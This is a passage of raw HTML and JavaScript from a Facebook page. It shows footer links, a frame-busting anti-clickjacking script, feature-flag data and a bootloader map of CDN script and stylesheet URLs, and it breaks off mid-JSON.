<li><a href="/places/" title="Take a look at popular places on Facebook.">Places</a>
</li>
<li><a href="/games/" title="Check out Facebook games.">Games</a></li>
<li><a href="/directory/places/" title="Browse our places directory.">Locations</a>
</li>
<li><a href="/marketplace/"
title="Buy and sell on Facebook Marketplace.">Marketplace</a></li>
<li><a href="https://pay.facebook.com/" target="_blank"
title="Learn more about Facebook Pay">Facebook Pay</a></li>
<li><a href="/directory/groups/" title="Browse our Groups directory.">Groups</a>
</li>
<li><a href="/jobs/" title="Apply for jobs and hire on Facebook.">Jobs</a></li>
<li><a href="https://www.oculus.com/" target="_blank"
title="Learn more about Oculus">Oculus</a></li>
<li><a href="https://portal.facebook.com/" target="_blank"
title="Learn more about Portal from Facebook">Portal</a></li>
<li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&h=AT2utnxObxJKAGykmTd_ZzBo7IvZiupysyBfN_tFJ0qVYjhdrDNCHndxb7Dw_aw0eewWHj3ZzOz0M-bwXdwcByYuVWTTr7dtX8IuNWWHsCcPnY45t3G_zVRmupCAc0rsiXTdOy6QxgsVy5QvEJMO"
title="Take a look at Instagram" target="_blank" rel="noopener nofollow"
data-lynx-mode="asynclazy">Instagram</a></li>
<li><a href="/local/lists/245019872666104/"
title="Browse our Local Lists directory.">Local</a></li>
<li><a href="/fundraisers/" title="Donate to worthy causes.">Fundraisers</a></li>
<li><a href="/biz/directory/"
title="Browse our Facebook Services directory.">Services</a></li>
<li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D"
title="See the Voting Information Centre">Voting Information Centre</a></li>
<li><a href="/facebook" accesskey="8"
title="Read our blog, discover the resource centre and find job opportunities.">About</a>
</li>
<li><a href="/ad_campaign/landing.php?placement=pflo&campaign_id=402047449186&nav_source=unknown&extra_1=auto"
title="Advertise on Facebook">Create ad</a></li>
<li><a href="/pages/create/?ref_type=site_footer" title="Create a Page">Create
Page</a></li>
<li><a href="https://developers.facebook.com/?ref=pf"
title="Develop on our platform.">Developers</a></li>
<li><a href="/careers/?ref=pf"
title="Make your next career move to our brilliant company.">Careers</a>
</li>
<li><a data-nocookies="1" href="/privacy/explanation"
title="Learn about your privacy and Facebook.">Privacy</a></li>
<li><a href="/policies/cookies/" title="Learn about cookies and Facebook."
data-nocookies="1">Cookies</a></li>
<li><a class="_41ug" data-nocookies="1"
href="https://www.facebook.com/help/568137493302217"
title="Learn about AdChoices.">AdChoices<i
class="img sp_kVm6cmI9bbE sx_104889"></i></a></li>
<li><a data-nocookies="1" href="/policies?ref=pf" accesskey="9"
title="Review our terms and policies.">Terms</a></li>
<li><a href="/help/?ref=pf" accesskey="0" title="Visit our Help Centre.">Help</a>
</li>
<li><a accesskey="6" class="accessible_elem" href="/settings"
title="View and edit your Facebook settings.">Settings</a></li>
<li><a accesskey="7" class="accessible_elem"
href="/allactivity?privacy_source=activity_log_top_menu"
title="View your activity log">Activity log</a></li>
</ul>
</div>
<div class="mvl copyright">
<div><span> Facebook © 2021</span></div>
</div>
</div>
</div>
</div>
</div>
</div>
<div></div><span><img src="https://facebook.com/security/hsts-pixel.gif" width="0" height="0"
style="display:none" /></span>
</div>
<div style="display:none">
<div></div>
<div></div>
</div>
<script type="text/javascript" nonce="nHhiRPia">
/*<![CDATA[*/
(function () {
function si_cj(m) {
setTimeout(function () {
new Image().src =
"https:\/\/error.facebook.com\/common\/scribe_endpoint.php?c=si_clickjacking&t=3214" +
"&m=" + m;
}, 5000);
}
if (top != self) {
try {
if (parent != top) {
throw 1;
}
var si_cj_d = ["apps.facebook.com", "apps.beta.facebook.com"];
var href = top.location.href.toLowerCase();
for (var i = 0; i < si_cj_d.length; i++) {
if (href.indexOf(si_cj_d[i]) >= 0) {
throw 1;
}
}
si_cj("3 ");
} catch (e) {
si_cj("1 \t");
window.document.write(
"\u003Cstyle nonce=\"nHhiRPia\">body * {display:none !important;}\u003C\/style>\u003Ca href=\"#\" onclick=\"top.location.href=window.location.href\" style=\"display:block !important;padding:10px\">Go to Facebook.com\u003C\/a>"
); /*Br4qz_LP*/
}
}
}()) /*]]>*/
</script>
<script>
requireLazy(["HasteSupportData"], function (m) {
m.handle({
"bxData": {
"875231": {
"uri": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/yD\/r\/d4ZIVX-5C-b.ico"
}
},
"gkxData": {
"677762": {
"result": true,
"hash": "AT6e9MvRyXpacwOYrTo"
},
"1243461": {
"result": false,
"hash": "AT7fIw7JO3EJySTc2EY"
},
"1955417": {
"result": true,
"hash": "AT7RqXJgst3BkBZ_tW8"
},
"1804603": {
"result": true,
"hash": "AT56Qtp0BMJ1B-A3bo8"
},
"1908135": {
"result": false,
"hash": "AT6miGypJl3m2Aq4bwM"
},
"819236": {
"result": false,
"hash": "AT66vW86d2uJ-kXPGjU"
},
"729630": {
"result": false,
"hash": "AT71BJjMNUltsSeV-yo"
},
"729631": {
"result": false,
"hash": "AT7b0tj8AHWG5lTFDZg"
},
"1281505": {
"result": false,
"hash": "AT4PHZM9gFoypCjQf5Q"
},
"1291023": {
"result": false,
"hash": "AT519LseIG1nwq3oWmo"
},
"1294182": {
"result": false,
"hash": "AT4vd6mwrtAJouEJ6Ew"
},
"1399218": {
"result": true,
"hash": "AT6guCW1eyIkOV1E8MU"
},
"1401060": {
"result": true,
"hash": "AT5aetN5Gb3reIXVA28"
},
"1485055": {
"result": true,
"hash": "AT5lkGxmhfrVKlcni_s"
},
"1596063": {
"result": false,
"hash": "AT7JHuDWtaOqRuBU42M"
},
"1597642": {
"result": true,
"hash": "AT78G4fDXhlnMl7oBag"
},
"1620803": {
"result": true,
"hash": "AT5gdwnzUqRbHlnPQX4"
},
"1647260": {
"result": false,
"hash": "AT4WdkrQSGE5dIsEeDY"
},
"1695831": {
"result": false,
"hash": "AT7RA6TJmDFGF-D6lC0"
},
"1722014": {
"result": false,
"hash": "AT6_M5gpc6RLrHjc4S4"
},
"1742795": {
"result": false,
"hash": "AT6dbnY5JZm_bTINDrE"
},
"1778302": {
"result": false,
"hash": "AT65fisZhmc2X92ET8s"
},
"1840809": {
"result": false,
"hash": "AT5nYctoTsr7alRimKc"
},
"1848749": {
"result": false,
"hash": "AT5GsH9Kb-3W-taZGQ0"
},
"1906871": {
"result": false,
"hash": "AT6dIBiVv9bUDXlm26c"
},
"1985945": {
"result": true,
"hash": "AT66Oo5lY__5wUTp7Oo"
},
"1099893": {
"result": false,
"hash": "AT5kly2LSZV_DKGR51c"
},
"1951072": {
"result": true,
"hash": "AT7aEvzO1O_H_j8HRVI"
}
},
"qexData": {
"1981829": {
"r": null
},
"1768468": {
"r": null
}
}
})
});
requireLazy(["Bootloader"], function (m) {
m.handlePayload({
"sr_revision": 1003448310,
"consistency": {
"rev": 1003448310
},
"rsrcMap": {
"IqnzN": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ij9m4\/yE\/l\/en_GB\/f9Mv4y9tivm.js?_nc_x=Ij3Wp8lg5Kz"
},
"EAoOu": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/ys\/r\/fnvypMQ2hR1.js?_nc_x=Ij3Wp8lg5Kz"
},
"dAiGV": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3igbH4\/y3\/l\/en_GB\/0nd0ZGjExb5.js?_nc_x=Ij3Wp8lg5Kz"
},
"b\/C9s": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y1\/r\/BnlqXcznuVX.js?_nc_x=Ij3Wp8lg5Kz"
},
"KbYEx": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y0\/r\/ixBMgOXn-ph.js?_nc_x=Ij3Wp8lg5Kz"
},
"wzs1q": {
"type": "css",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yl\/l\/0,cross\/O-1pqcBivPL.css?_nc_x=Ij3Wp8lg5Kz"
},
"opLOF": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iTQy4\/yb\/l\/en_GB\/B6NNIe-xFbS.js?_nc_x=Ij3Wp8lg5Kz"
},
"ICEKG": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iCwx4\/y8\/l\/en_GB\/38R4CWUkqUZ.js?_nc_x=Ij3Wp8lg5Kz"
},
"ZwXRt": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yl\/r\/_EKTpNjVgmf.js?_nc_x=Ij3Wp8lg5Kz"
},
"klr3O": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iLl54\/yg\/l\/en_GB\/oFPV1v0BI4V.js?_nc_x=Ij3Wp8lg5Kz"
},
"upr+L": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/ys\/r\/EDIrRN3PqXA.js?_nc_x=Ij3Wp8lg5Kz"
},
"HAeVM": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ikjp4\/yU\/l\/en_GB\/wUGm-2iSSzP.js?_nc_x=Ij3Wp8lg5Kz"
},
"Dcggo": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iPIv4\/yx\/l\/en_GB\/uZGcp_sVQBr.js?_nc_x=Ij3Wp8lg5Kz"
},
"7Es1F": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iqv54\/yJ\/l\/en_GB\/IclvnsBUL_3.js?_nc_x=Ij3Wp8lg5Kz"
},
"QwEwe": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yV\/r\/Gz91RGCH0iE.js?_nc_x=Ij3Wp8lg5Kz"
},
"iXgW2": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iTfb4\/yN\/l\/en_GB\/XCzbj9_TV7k.js?_nc_x=Ij3Wp8lg5Kz"
},
"Vl2QP": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iWtR4\/y1\/l\/en_GB\/KPT6P3wXHXS.js?_nc_x=Ij3Wp8lg5Kz"
},
"k9BMX": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i1MJ4\/y3\/l\/en_GB\/94FgXhe2Wkt.js?_nc_x=Ij3Wp8lg5Kz"
},
"+ClWy": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yU\/r\/UJOxW2IHm1a.js?_nc_x=Ij3Wp8lg5Kz"
},
"8ELCB": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/ye\/r\/VRzSVH5iU-V.js?_nc_x=Ij3Wp8lg5Kz"
},
"XS1eF": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ijhd4\/yK\/l\/en_GB\/0NIIOvQ0PWJ.js?_nc_x=Ij3Wp8lg5Kz"
},
"oE4Do": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yJ\/r\/EejAgnHUad4.js?_nc_x=Ij3Wp8lg5Kz"
},
"885v5": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iDdH4\/yR\/l\/en_GB\/Jl8tnlXEWrO.js?_nc_x=Ij3Wp8lg5Kz"
},
"Y4Pxs": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yY\/r\/WA6JcVCLF6i.js?_nc_x=Ij3Wp8lg5Kz"
},
"9OX9e": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y3\/r\/PaDDimUMWXJ.js?_nc_x=Ij3Wp8lg5Kz"
},
"Dnrgo": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iYXl4\/yL\/l\/en_GB\/rAlkD6t_tBd.js?_nc_x=Ij3Wp8lg5Kz"
},
"q2faU": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y9\/r\/bw3dIopsz6G.js?_nc_x=Ij3Wp8lg5Kz"
},
"VK0qH": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i3MQ4\/y-\/l\/en_GB\/LP9VPaUzXEr.js?_nc_x=Ij3Wp8lg5Kz"
},
"2\/maQ": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yk\/r\/R9lc5DaDrGJ.js?_nc_x=Ij3Wp8lg5Kz"
},
"ylVec": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3irQI4\/yC\/l\/en_GB\/Wh0P0TyLLz8.js?_nc_x=Ij3Wp8lg5Kz"
},
"\/8Wbb": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y3\/r\/SmuWDYn1CdY.js?_nc_x=Ij3Wp8lg5Kz"
},
"abWGO": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3imXV4\/yc\/l\/en_GB\/wj9wYSi7lJx.js?_nc_x=Ij3Wp8lg5Kz"
},
"\/mnVq": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iFJJ4\/yJ\/l\/en_GB\/L-LsXfgBASr.js?_nc_x=Ij3Wp8lg5Kz"
},
"nhlJH": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i72D4\/y2\/l\/en_GB\/86tts6mN0cf.js?_nc_x=Ij3Wp8lg5Kz"
},
"UMyRo": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yB\/r\/pr4Ez__gTxI.js?_nc_x=Ij3Wp8lg5Kz"
},
"+TgpX": {
"type": "css",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yN\/l\/0,cross\/bqaJBDotylx.css?_nc_x=Ij3Wp8lg5Kz"
},
"G9cPc": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ibIe4\/yz\/l\/en_GB\/CAyIrJ2hz9_.js?_nc_x=Ij3Wp8lg5Kz"
},
"3+lS7": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iAgG4\/y6\/l\/en_GB\/ackXDi4WzXR.js?_nc_x=Ij3Wp8lg5Kz"
},
"z0dct": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yU\/r\/W7FIYoitRrx.js?_nc_x=Ij3Wp8lg5Kz"
},
"kw\/60": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ibHV4\/yz\/l\/en_GB\/5iGRsKBHO0a.js?_nc_x=Ij3Wp8lg5Kz"
},
"fjidr": {
"type": "css",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y2\/l\/0,cross\/7hHLNpi8q5J.css?_nc_x=Ij3Wp8lg5Kz"
},
"0KDUP": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yt\/r\/x5iSqYJz0xB.js?_nc_x=Ij3Wp8lg5Kz"
},
"+PUle": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y2\/r\/vrDIK5xfYb9.js?_nc_x=Ij3Wp8lg5Kz"
},
"liI1q": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yh\/r\/sdXhGg1rOxr.js?_nc_x=Ij3Wp8lg5Kz"
},
"j2PT4": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/ya\/r\/wqqkSC1UP_s.js?_nc_x=Ij3Wp8lg5Kz"
},
"7yHBQ": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yC\/r\/opEEIc4y6TG.js?_nc_x=Ij3Wp8lg5Kz"
},
"kGJ3F": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yj\/r\/rrQ_fN4Rm7L.js?_nc_x=Ij3Wp8lg5Kz"
},
"PkNK5": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/ys\/r\/r1rws0upfze.js?_nc_x=Ij3Wp8lg5Kz"
},
"arqLm": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yt\/r\/br_dUgIONBI.js?_nc_x=Ij3Wp8lg5Kz"
},
"DG7Ii": {
"type": "css",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yg\/l\/0,cross\/K-k9E4qKhJA.css?_nc_x=Ij3Wp8lg5Kz"
},
"Etm\/I": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y9\/r\/66TIDURowQA.js?_nc_x=Ij3Wp8lg5Kz"
},
"nkqsr": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y-\/r\/pMYnBUNtFXR.js?_nc_x=Ij3Wp8lg5Kz"
},
"QQNFB": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y_\/r\/bFAqdc57CxC.js?_nc_x=Ij3Wp8lg5Kz"
},
"yfgo6": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iWjr4\/yP\/l\/en_GB\/OgYKbJOeS03.js?_nc_x=Ij3Wp8lg5Kz"
},
"zAb0r": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i9Zn4\/y_\/l\/en_GB\/WsQP6_Bu9bw.js?_nc_x=Ij3Wp8lg5Kz"
},
"o6Irt": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yQ\/r\/hBcMoCdcNuL.js?_nc_x=Ij3Wp8lg5Kz"
},
"G0xtD": {
"type": "css",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yu\/l\/0,cross\/QBAC536MpeR.css?_nc_x=Ij3Wp8lg5Kz"
},
"W2HPr": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ijdH4\/yO\/l\/en_GB\/ds-phic3-oe.js?_nc_x=Ij3Wp8lg5Kz"
},
"YD\/ol": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iztO4\/yM\/l\/en_GB\/9ZJslfda94p.js?_nc_x=Ij3Wp8lg5Kz"
},
"OGJba": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ixJ84\/ye\/l\/en_GB\/anvxR1ka2Np.js?_nc_x=Ij3Wp8lg5Kz"
},
"gcDYl": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yE\/r\/BVN-DLuD6EV.js?_nc_x=Ij3Wp8lg5Kz"
},
"ZtSVE": {
"type": "css",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yN\/l\/0,cross\/tIlvNM5EIy3.css?_nc_x=Ij3Wp8lg5Kz"
},
"Y+gbl": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i9pl4\/yX\/l\/en_GB\/w210e4ua7ll.js?_nc_x=Ij3Wp8lg5Kz"
},
"\/Hfxd": {
"type": "css",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yG\/l\/0,cross\/8BBsJODlrDC.css?_nc_x=Ij3Wp8lg5Kz"
},
"kU0Y2": {
"type": "css",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yF\/l\/0,cross\/Qp52qgfUvYl.css?_nc_x=Ij3Wp8lg5Kz"
},
"vD6gn": {
"type": "css",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yq\/l\/0,cross\/qv6lWyj5nGr.css?_nc_x=Ij3Wp8lg5Kz"
},
"vb6jB": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yD\/r\/T-5ZpBjEMnN.js?_nc_x=Ij3Wp8lg5Kz"
},
"p6v7l": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iE0t4\/ym\/l\/en_GB\/Erd3EeKM--4.js?_nc_x=Ij3Wp8lg5Kz"
},
"KFvsj": {
"type": "css",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yV\/l\/0,cross\/b7iWMV2PKCV.css?_nc_x=Ij3Wp8lg5Kz"
},
"3wbX4": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i8NL4\/yS\/l\/en_GB\/oIBl0guDB0g.js?_nc_x=Ij3Wp8lg5Kz"
},
"FYMSp": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yy\/r\/kVZFTdWLIly.js?_nc_x=Ij3Wp8lg5Kz"
},
"Wmp8H": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ikpZ4\/yB\/l\/en_GB\/_MkW83GFlJL.js?_nc_x=Ij3Wp8lg5Kz"
},
"IL7RH": {
"type": "css",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/ys\/l\/0,cross\/Se4PpxNbuFT.css?_nc_x=Ij3Wp8lg5Kz"
},
"WeUAK": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/ym\/r\/4mOEbyllGML.js?_nc_x=Ij3Wp8lg5Kz"
},
"PoxYZ": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i89Q4\/y2\/l\/en_GB\/PKpKI1J_Fpa.js?_nc_x=Ij3Wp8lg5Kz"
},
"CWj+p": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ih2f4\/yw\/l\/en_GB\/rgusS01U_54.js?_nc_x=Ij3Wp8lg5Kz"
},
"NVC4W": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yG\/r\/jf43jL33vGK.js?_nc_x=Ij3Wp8lg5Kz"
},
"M4wDl": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3izIW4\/ym\/l\/en_GB\/wv14sVaoFH1.js?_nc_x=Ij3Wp8lg5Kz"
},
"hFeSh": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iLl54\/y5\/l\/en_GB\/yEzGDZULlXP.js?_nc_x=Ij3Wp8lg5Kz"
},
"pb+f9": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yN\/r\/GbOSxBDmGhP.js?_nc_x=Ij3Wp8lg5Kz"
},
"SUmGJ": {
"type": "css",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yS\/l\/0,cross\/vFG4IFwiPkO.css?_nc_x=Ij3Wp8lg5Kz"
},
"XoZXj": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iRwU4\/yx\/l\/en_GB\/Q3965UAvP1n.js?_nc_x=Ij3Wp8lg5Kz"
},
"CPsJs": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iJga4\/ya\/l\/en_GB\/cIO2xDu7jA_.js?_nc_x=Ij3Wp8lg5Kz"
},
"yEGNH": {
"type": "css",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yR\/l\/0,cross\/hoPN2OtWhtU.css?_nc_x=Ij3Wp8lg5Kz"
},
"fqMQ+": {
"type": "css",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yt\/l\/0,cross\/jXMwT_LLG85.css?_nc_x=Ij3Wp8lg5Kz"
},
"8N6zt": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iX074\/yK\/l\/en_GB\/mBjS4DhAnKa.js?_nc_x=Ij3Wp8lg5Kz"
},
"elJXs": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/ym\/r\/FmXSR41IxW_.js?_nc_x=Ij3Wp8lg5Kz"
},
"5JIiC": {
"type": "css",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yT\/l\/0,cross\/4fHYPVyKUmz.css?_nc_x=Ij3Wp8lg5Kz"
},
"Le2KY": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iqeO4\/y4\/l\/en_GB\/5cJBaDFxrAa.js?_nc_x=Ij3Wp8lg5Kz"
},
"AZAh4": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iNUD4\/yA\/l\/en_GB\/p2I5RJowr6Z.js?_nc_x=Ij3Wp8lg5Kz"
},
"46DeS": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i4Wl4\/ys\/l\/en_GB\/6X1-2KstEgz.js?_nc_x=Ij3Wp8lg5Kz"
},
"thkqN": {
"type": "css",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y-\/l\/0,cross\/c3jIEybAfx7.css?_nc_x=Ij3Wp8lg5Kz"
},
"G\/F7M": {
"type": "css",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yl\/l\/0,cross\/6513uBMWM7k.css?_nc_x=Ij3Wp8lg5Kz"
},
"Z9sAJ": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iBqb4\/yD\/l\/en_GB\/L3HzyhFxZvf.js?_nc_x=Ij3Wp8lg5Kz"
},
"pBquy": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i3fm4\/ys\/l\/en_GB\/m7dTYVYPQhD.js?_nc_x=Ij3Wp8lg5Kz"
},
"4QSOX": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yw\/r\/sxnWvf4n0cJ.js?_nc_x=Ij3Wp8lg5Kz"
},
"3zFt6": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y2\/r\/6WwHHsCOxdd.js?_nc_x=Ij3Wp8lg5Kz"
},
"wWSAV": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iHwg4\/yQ\/l\/en_GB\/FVpzZcho7Vn.js?_nc_x=Ij3Wp8lg5Kz"
},
"DxHlI": {
"type": "css",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yb\/l\/0,cross\/yoEitfqJlIy.css?_nc_x=Ij3Wp8lg5Kz",
"nonblocking": 1
},
"HlSPQ": {
"type": "css",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yF\/l\/0,cross\/hnLu--l1qhu.css?_nc_x=Ij3Wp8lg5Kz",
"nonblocking": 1
},
"vJ9N2": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ixTc4\/yY\/l\/en_GB\/YrgREfXmh4G.js?_nc_x=Ij3Wp8lg5Kz"
},
"8qfyn": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iDSI4\/y5\/l\/en_GB\/GGlis4rBs_9.js?_nc_x=Ij3Wp8lg5Kz"
},
"kWFQV": {
"type": "css",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yB\/l\/0,cross\/rIVCmS_hBDz.css?_nc_x=Ij3Wp8lg5Kz"
},
"fE7rj": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iAXF4\/yG\/l\/en_GB\/bTQSPeuWetQ.js?_nc_x=Ij3Wp8lg5Kz"
},
"gWMJg": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yH\/r\/iGksp69foR_.js?_nc_x=Ij3Wp8lg5Kz"
},
"hIek+": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yY\/r\/DZ_VBlsy-dC.js?_nc_x=Ij3Wp8lg5Kz"
},
"Gj8v9": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yp\/r\/ywDDEhGQ14B.js?_nc_x=Ij3Wp8lg5Kz"
},
"VvVFw": {
"type": "js",
"src": "https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yU\/r\/weqjNiXubEB.js?_nc_x=Ij3Wp8lg5Kz"
},
"P\/mr5": {
"type": "css",
"src": "data:text\/css; charset=utf-8,\u002523bootloader_P_mr5{height:42px;}.bootloader_P_mr5{display:block!important;}",
"nc": 1,
"d": 1
}
},
"compMap": {
"AsyncRequest": {
"r": ["IqnzN", "eeYF5", "EAoOu"],
"rds": {
"m": ["FbtLogging", "IntlQtEventFalcoEvent", "BanzaiScuba_DEPRECATED"],
"r": ["dAiGV", "b\/C9s"]
}
},
"Dialog": {
"r": ["dAiGV", "KbYEx", "IqnzN", "b\/C9s", "TYks2", "wzs1q", "eeYF5", "opLOF",
"ICEKG", "EAoOu", "ZwXRt"
],
"rds": {
"m": ["FbtLogging", "IntlQtEventFalcoEvent", "Animation", "PageTransitions",
"BanzaiScuba_DEPRECATED"
]
},
"be": 1
},
"ExceptionDialog": {
"r": ["dAiGV", "klr3O", "KbYEx", "upr+L", "IqnzN", "4l\/Jz", "HAeVM", "b\/C9s",
